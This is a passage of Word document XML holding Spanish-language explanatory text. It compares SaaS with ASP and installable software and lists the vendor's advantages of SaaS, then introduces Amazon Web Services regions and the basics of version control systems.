        <w:t xml:space="preserve"> administración de los recursos </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">físicos y de software alojados en el </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>proveedor ASP, lo qu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">e incrementa los costos, por lo </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>que muchos terminan optando por instalar el softwar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">e en sus propios servidores. En </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>cambio, como vimos el modelo SaaS fue diseñado espe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cíficamente para aprovechar los </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>recursos al máximo, y, además, el proveedor se enca</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">rga de la administración de los </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>recursos físicos y de software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966700" w:rsidRPr="00966700" w:rsidRDefault="00966700" w:rsidP="00966700">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Dado que un Software como Servicio es utilizado y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> comercializado vía red, sin la </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>necesidad de que el cliente tenga que instalarse nada, es</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">te modelo difiere completamente </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>del modelo tradicional de software ofrecido como un produc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">to instalable en el cliente. En </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>el modelo de Software como Producto (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>SaaP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>), los provee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">dores desarrollan el software y </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>lo empaquetan para ser distribuido bajo un nombre y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> una versión determinada, en un </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>soporte físico digital como un CD o DVD, o para se</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">r descargado desde Internet. El </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>producto está preparado para ser alojado en las instalacio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">nes informáticas del cliente, y </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>viene asociado con un contrato de licencia de uso que</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> define bajo qué condiciones se </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>puede instalar y utilizar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966700" w:rsidRDefault="00966700" w:rsidP="00966700">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Para el proveedor, desarrollar una solución SaaS en lugar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> de un producto, le trae varias ventajas, por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966700" w:rsidRPr="00966700" w:rsidRDefault="00966700" w:rsidP="00966700">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Le permite tener un mejor control y administración del software, dado que el mismo reside en sus instalaciones de forma completa, y no esta diseminado en todos los clientes. Esto le permite al proveedor modificar, actualizar y corregir lo que sea necesario sin la necesidad de liberar versiones de forma periódica o parches.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966700" w:rsidRPr="00966700" w:rsidRDefault="00966700" w:rsidP="00966700">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>El proveedor solo debe codificar el software para una única plataforma, y al ser accedido vía internet, llegar a plataformas heterogéneas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966700" w:rsidRPr="00966700" w:rsidRDefault="00966700" w:rsidP="00966700">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Dado que la aplicación está alojada en la infraestructura del proveedor, le permite tener un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>feedback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rápido de los clientes y de los bugs que se producen en la aplicación, en lugar de esperar reportes de los clientes en forma esporádica.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966700" w:rsidRPr="00966700" w:rsidRDefault="00966700" w:rsidP="00966700">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Con un producto, es el cliente el que decide siempre migrar de una versión a la otra, y el proveedor tiene la obligación de ofrecer mantenimiento y soporte para versiones anteriores. En cambio, controlar y administrar un software alojado en servidores controlados por el proveedor, supone una mayor flexibilidad para aplicar actualizaciones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001009B" w:rsidRDefault="0001009B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D7232" w:rsidRDefault="006D7232">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006D7232" w:rsidRDefault="006D7232" w:rsidP="00457363">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:t>Desarrollo de Aplicaciones SaaS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00457363" w:rsidRDefault="00457363" w:rsidP="00457363">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00457363">
        <w:t xml:space="preserve">Amazon Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00457363">
        <w:t>Services</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00457363" w:rsidRDefault="00457363" w:rsidP="00457363">
      <w:r w:rsidRPr="00457363">
        <w:t xml:space="preserve">Amazon Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00457363">
        <w:t>Services</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00457363">
        <w:t xml:space="preserve"> (AWS abreviado) es una colección de servicios de computación en la nube (también llamados servicios web) que en conjunto forman una plataforma de computación en la nube, ofrecidas a través de Internet por Amazon.com. Es usado en aplicaciones populares como Dropbox, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00457363">
        <w:t>Foursquare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00457363">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00457363">
        <w:t>HootSuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00457363">
        <w:t xml:space="preserve">. Es una de las ofertas internacionales más importantes de la computación en la nube y compite directamente contra servicios como Microsoft </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00457363">
        <w:t>Azure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00457363">
        <w:t xml:space="preserve"> y Google Cloud </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00457363">
        <w:t>Platform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00457363">
        <w:t>. Es considerado como un pionero en este campo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00457363" w:rsidRPr="00457363" w:rsidRDefault="00457363" w:rsidP="00457363">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457363">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Arquitectura</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00457363" w:rsidRPr="00457363" w:rsidRDefault="00457363" w:rsidP="00457363">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457363">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS está situado en 9 Regiones geográficas: EE.UU. Este (Norte de Virginia), EE.UU. Oeste (Norte de California), EE.UU. Oeste (Oregón), AWS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00457363">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>GovCloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00457363">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (EE.UU.), São Paulo (Brasil), Irlanda, Singapur, Tokio y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00457363">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sydney</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00457363">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. También hay un "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00457363">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>GovCloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00457363">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>" en los EE.UU. proporcionado para los clientes del Gobierno de EE.UU. Cada región está totalmente contenida dentro de un solo país y todos sus datos y servicios permanecen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> dentro de la región designada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00457363" w:rsidRDefault="00457363" w:rsidP="00457363">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457363">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Cada región tiene múltiples "zonas de disponibilidad", que son los diferentes centros de datos que proporcionan servicios de AWS. Las zonas de disponibilidad están aisladas unas de otras para evitar la propagación de cortes entre las zonas. Varios servicios operan a través de zonas de disponibilidad (por ejemplo, S3, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00457363">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DynamoDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00457363">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>), mientras que otros pueden estar configurados para reproducirse a través de zonas para extender la demanda y evitar el tiempo de inactividad de los fallos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRPr="00245646" w:rsidRDefault="00245646" w:rsidP="00245646">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="58B6C0" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="58B6C0" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Control de versiones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRPr="00245646" w:rsidRDefault="00245646" w:rsidP="00245646">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Se llama control de versiones a la gestión de los diversos cambios que se realizan sobre los elementos de algún producto o una configuración del mismo. Una versión, revisión o edición de un producto, es el estado en el que se encuentra el mismo en un momento dado d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e su desarrollo o modificación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRPr="00245646" w:rsidRDefault="00245646" w:rsidP="00245646">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Aunque un sistema de control de versiones puede realizarse de forma manual, es muy aconsejable disponer de herramientas que faciliten esta gestión dando lugar a los llamados sistemas de control de versiones o VCS (del inglés </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Control </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">). Estos sistemas facilitan la administración de las distintas versiones de cada producto desarrollado, así como las posibles especializaciones realizadas (por ejemplo, para algún cliente específico). Ejemplos de este tipo de herramientas son entre otros: CVS, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Subversion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, SourceSafe, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ClearCase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Darcs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Bazaar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Plastic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> SCM, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, Mercurial, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Perforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Fossil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> SCM, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Foundation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRPr="00245646" w:rsidRDefault="00245646" w:rsidP="00245646">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRDefault="00245646" w:rsidP="00245646">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">El control de versiones se realiza principalmente en la industria informática para controlar las distintas versiones del código fuente dando lugar a los sistemas de control de código fuente o SCM (siglas del inglés </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Source</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Management). Sin embargo, los mismos conceptos son aplicables a otros ámbitos como documentos, imágenes, sitios web, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRPr="00245646" w:rsidRDefault="00245646" w:rsidP="00245646">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Características</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRPr="00245646" w:rsidRDefault="00245646" w:rsidP="00245646">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Un sistema de control </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de versiones debe proporcionar:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRPr="00245646" w:rsidRDefault="00245646" w:rsidP="00245646">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Mecanismo de almacenamiento de los elementos que deba gestionar (ej. archivos de texto, imágenes, documentación...).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRPr="00245646" w:rsidRDefault="00245646" w:rsidP="00245646">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Posibilidad de realizar cambios sobre los elementos almacenados (ej. modificaciones parciales, añadir, borrar, renombrar o mover elementos).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRPr="00245646" w:rsidRDefault="00245646" w:rsidP="00245646">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Registro histórico de las acciones realizadas con cada elemento o conjunto de elementos (normalmente pudiendo volver o extraer un estado anterior del producto).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRDefault="00245646" w:rsidP="00245646">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245646">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Aunque no es estrictamente necesario, suele ser muy útil la generación de informes con los cambios introducidos entre dos versiones, informes de estado, marcado con nombre identificativo de la versión de un conjunto de ficheros, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00437E6D" w:rsidRDefault="00437E6D" w:rsidP="00437E6D">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00437E6D">
        <w:t>Flujos de trabajo</w:t>
      </w:r>
